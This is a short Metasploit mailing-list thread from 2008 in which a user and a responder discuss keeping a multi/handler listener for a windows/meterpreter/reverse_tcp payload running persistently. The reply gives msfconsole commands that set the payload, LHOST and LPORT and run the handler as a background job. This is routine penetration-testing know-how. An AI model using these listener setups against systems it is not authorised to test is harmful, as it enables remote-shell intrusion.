Metasploit mailing list archives

run after logout


From: egypt at nmt.edu (James Lee)
Date: Mon, 15 Dec 2008 10:54:09 -0700

You might be interested in the ExitOnSession variable, although I
don't know if it would work in msfcli since there's no job control.
What you can do is use msfconsole like so:


msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST A.B.C.D
msf exploit(handler) > set LPORT 8080
msf exploit(handler) > exploit -j

More info about this can be found at
http://metasploit.com/dev/trac/wiki/AutomatingMeterpreter

On Mon, Dec 15, 2008 at 9:48 AM, jeffs <jeffs at speakeasy.net> wrote:
I'd like to get a command like:

./msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp
lhost=192.168.1.101 lport=4444 autorunscript=mynewscript E

to continue running after I logout so subsequent request work.

I have tried:

nohup ./msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp
lhost=192.168.1.101 lport=4444 autorunscript=mynewscript E &

but this only works for one request after logging out of the terminal.

Is there something I'm missing here?

Thanks
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework




Current thread: